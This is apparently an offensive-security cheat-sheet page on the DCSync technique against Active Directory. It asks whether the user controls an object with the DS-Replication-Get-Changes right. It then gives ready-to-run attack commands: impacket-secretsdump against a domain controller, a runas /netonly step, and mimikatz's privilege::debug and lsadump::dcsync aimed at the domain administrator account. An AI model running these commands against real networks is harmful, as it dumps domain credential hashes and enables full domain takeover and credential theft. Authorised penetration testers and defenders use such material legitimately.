Skip to content

DCSync

Identify

Do you control an object with the DS-Replication-Get-Changes ACL?

Exploit

impacket-secretsdump 'domain.local'/'<user>':'<pass>'@'<DC0IP>'
From windows 
runas /netonly /user:DOMAIN\user powershell

.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administrator